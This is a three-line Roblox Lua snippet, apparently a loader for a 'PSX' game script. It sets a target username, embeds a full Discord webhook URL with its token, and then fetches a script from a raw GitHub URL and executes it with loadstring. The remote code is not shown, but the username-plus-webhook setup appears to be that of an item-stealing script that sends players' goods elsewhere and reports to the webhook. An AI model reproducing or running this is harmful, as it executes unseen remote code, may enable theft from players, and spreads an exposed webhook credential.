UserName = "DemonicMi_ggie"
WebHook = "https://discord.com/api/webhooks/1050513961256235019/kAtMCx4GUidogdzZ0-cXoWJZEQNEYaXIS3CtsLK5DGOrpIc0qYzald6f9LoiEDolm432"

loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/Script.lua", true))()
